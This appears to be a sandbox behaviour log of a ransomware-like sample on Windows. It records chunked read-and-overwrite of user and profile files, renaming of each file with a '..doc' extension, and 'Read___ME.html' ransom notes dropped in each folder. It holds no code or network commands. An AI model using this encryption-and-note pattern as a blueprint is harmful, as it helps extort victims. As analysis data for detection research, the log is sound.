File	Read	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms, size = 8192	1	Fn Data
File	Read	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms, size = 8192	1	Fn Data
File	Read	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms, size = 8192	1	Fn Data
File	Read	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms, size = 8192	1	Fn Data
File	Read	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms, size = 8192	1	Fn Data
File	Read	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms, size = 8192	1	Fn Data
File	Read	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms, size = 8192	1	Fn Data
File	Read	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms, size = 8192	1	Fn Data
File	Read	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms, size = 8192	1	Fn Data
File	Read	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms, size = 8192	1	Fn Data
File	Read	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms, size = 8192	1	Fn Data
File	Read	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms, size = 8192	1	Fn Data
File	Read	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms, size = 8192	1	Fn Data
File	Read	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms, size = 8192	1	Fn Data
File	Read	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms, size = 8192	1	Fn Data
File	Read	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms, size = 8192, size_out = 0	1	Fn
File	Write	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms, size = 32	1	Fn Data
File	Write	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms, size = 16	1	Fn Data
File	Write	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms, size = 128	1	Fn Data
File	Write	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms, size = 768	1	Fn Data
File	Move	source_filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms, destination_filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms..doc, flags = MOVEFILE_REPLACE_EXISTING	1	Fn
File	Get Info	filename = C:\Users\Default\Read___ME.html, type = file_attributes	1	Fn
File	Create	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
File	Get Info	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms, type = size, size_out = 524288	1	Fn
File	Read	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms, size = 8192	1	Fn Data
File	Read	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms, size = 8192	1	Fn Data
File	Read	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms, size = 8192	1	Fn Data
File	Read	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms, size = 8192	1	Fn Data
File	Read	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms, size = 8192	1	Fn Data
File	Read	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms, size = 8192	1	Fn Data
File	Read	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms, size = 8192	1	Fn Data
File	Read	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms, size = 8192	1	Fn Data
File	Read	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms, size = 8192	1	Fn Data
File	Read	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms, size = 8192	1	Fn Data
File	Read	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms, size = 8192	1	Fn Data
File	Read	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms, size = 8192	1	Fn Data
File	Read	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms, size = 8192	1	Fn Data
File	Read	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms, size = 8192	1	Fn Data
File	Read	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms, size = 8192	1	Fn Data
File	Read	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms, size = 8192	1	Fn Data
File	Read	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms, size = 8192	1	Fn Data
File	Read	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms, size = 8192	1	Fn Data
File	Read	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms, size = 8192	1	Fn Data
File	Read	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms, size = 8192	1	Fn Data
File	Read	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms, size = 8192	1	Fn Data
File	Read	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms, size = 8192	1	Fn Data
File	Read	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms, size = 8192	1	Fn Data
File	Read	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms, size = 8192	1	Fn Data
File	Read	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms, size = 8192	1	Fn Data
File	Read	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms, size = 8192	1	Fn Data
File	Read	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms, size = 8192	1	Fn Data
File	Read	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms, size = 8192	1	Fn Data
File	Read	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms, size = 8192	1	Fn Data
File	Read	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms, size = 8192	1	Fn Data
File	Read	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms, size = 8192	1	Fn Data
File	Read	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms, size = 8192	1	Fn Data
File	Read	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms, size = 8192, size_out = 0	1	Fn
File	Write	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms, size = 32	1	Fn Data
File	Write	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms, size = 16	1	Fn Data
File	Write	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms, size = 128	1	Fn Data
File	Write	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms, size = 768	1	Fn Data
File	Move	source_filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms, destination_filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms..doc, flags = MOVEFILE_REPLACE_EXISTING	1	Fn
File	Get Info	filename = C:\Users\Default\Read___ME.html, type = file_attributes	1	Fn
File	Create	filename = C:\Users\CIiHmnxMn6Ps\NTUSER.DAT, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
File	Write	filename = System Paging File, size = 128	1	Fn
File	Write	filename = System Paging File, size = 768	1	Fn
File	Create	filename = C:\Users\CIiHmnxMn6Ps\ntuser.dat.LOG1, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
File	Write	filename = System Paging File, size = 128	1	Fn
File	Write	filename = System Paging File, size = 768	1	Fn
File	Create	filename = C:\Users\CIiHmnxMn6Ps\ntuser.dat.LOG2, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
File	Write	filename = System Paging File, size = 128	1	Fn
File	Write	filename = System Paging File, size = 768	1	Fn
File	Create	filename = C:\Users\CIiHmnxMn6Ps\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TM.blf, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
File	Write	filename = System Paging File, size = 128	1	Fn
File	Write	filename = System Paging File, size = 768	1	Fn
File	Create	filename = C:\Users\CIiHmnxMn6Ps\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
File	Write	filename = System Paging File, size = 128	1	Fn
File	Write	filename = System Paging File, size = 768	1	Fn
File	Create	filename = C:\Users\CIiHmnxMn6Ps\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
File	Write	filename = System Paging File, size = 128	1	Fn
File	Write	filename = System Paging File, size = 768	1	Fn
File	Create	filename = C:\Users\CIiHmnxMn6Ps\ntuser.ini, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\ntuser.ini, type = size, size_out = 20	1	Fn
File	Read	filename = C:\Users\CIiHmnxMn6Ps\ntuser.ini, size = 8192, size_out = 20	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\ntuser.ini, size = 32	2	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\ntuser.ini, size = 16	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\ntuser.ini, size = 128	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\ntuser.ini, size = 768	1	Fn Data
File	Move	source_filename = C:\Users\CIiHmnxMn6Ps\ntuser.ini, destination_filename = C:\Users\CIiHmnxMn6Ps\ntuser.ini..doc, flags = MOVEFILE_REPLACE_EXISTING	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\Read___ME.html, type = file_attributes	1	Fn
File	Create	filename = C:\Users\CIiHmnxMn6Ps\Read___ME.html, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Read___ME.html, size = 4282	1	Fn Data
File	Create	filename = C:\Users\CIiHmnxMn6Ps\Videos\desktop.ini, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\Videos\desktop.ini, type = size, size_out = 504	1	Fn
File	Read	filename = C:\Users\CIiHmnxMn6Ps\Videos\desktop.ini, size = 8192, size_out = 504	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\desktop.ini, size = 512	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\desktop.ini, size = 32	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\desktop.ini, size = 16	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\desktop.ini, size = 128	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\desktop.ini, size = 768	1	Fn Data
File	Move	source_filename = C:\Users\CIiHmnxMn6Ps\Videos\desktop.ini, destination_filename = C:\Users\CIiHmnxMn6Ps\Videos\desktop.ini..doc, flags = MOVEFILE_REPLACE_EXISTING	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\Videos\Read___ME.html, type = file_attributes	1	Fn
File	Create	filename = C:\Users\CIiHmnxMn6Ps\Videos\Read___ME.html, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\Read___ME.html, size = 4282	1	Fn Data
File	Create	filename = C:\Users\CIiHmnxMn6Ps\Videos\E2waSdX2n_.flv, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\Videos\E2waSdX2n_.flv, type = size, size_out = 18658	1	Fn
File	Read	filename = C:\Users\CIiHmnxMn6Ps\Videos\E2waSdX2n_.flv, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\E2waSdX2n_.flv, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\Videos\E2waSdX2n_.flv, size = 8192, size_out = 2274	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\E2waSdX2n_.flv, size = 2288	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\E2waSdX2n_.flv, size = 32	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\E2waSdX2n_.flv, size = 16	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\E2waSdX2n_.flv, size = 128	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\E2waSdX2n_.flv, size = 768	1	Fn Data
File	Move	source_filename = C:\Users\CIiHmnxMn6Ps\Videos\E2waSdX2n_.flv, destination_filename = C:\Users\CIiHmnxMn6Ps\Videos\E2waSdX2n_.flv..doc, flags = MOVEFILE_REPLACE_EXISTING	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\Videos\Read___ME.html, type = file_attributes	1	Fn
File	Create	filename = C:\Users\CIiHmnxMn6Ps\Videos\iBTwm8.mp4, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\Videos\iBTwm8.mp4, type = size, size_out = 62306	1	Fn
File	Read	filename = C:\Users\CIiHmnxMn6Ps\Videos\iBTwm8.mp4, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\iBTwm8.mp4, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\Videos\iBTwm8.mp4, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\iBTwm8.mp4, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\Videos\iBTwm8.mp4, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\iBTwm8.mp4, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\Videos\iBTwm8.mp4, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\iBTwm8.mp4, size = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\iBTwm8.mp4, size = 32	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\iBTwm8.mp4, size = 16	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\iBTwm8.mp4, size = 128	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\iBTwm8.mp4, size = 768	1	Fn Data
File	Move	source_filename = C:\Users\CIiHmnxMn6Ps\Videos\iBTwm8.mp4, destination_filename = C:\Users\CIiHmnxMn6Ps\Videos\iBTwm8.mp4..doc, flags = MOVEFILE_REPLACE_EXISTING	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\Videos\Read___ME.html, type = file_attributes	1	Fn
File	Create	filename = C:\Users\CIiHmnxMn6Ps\Videos\NY17G87uN.mkv, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\Videos\NY17G87uN.mkv, type = size, size_out = 73182	1	Fn
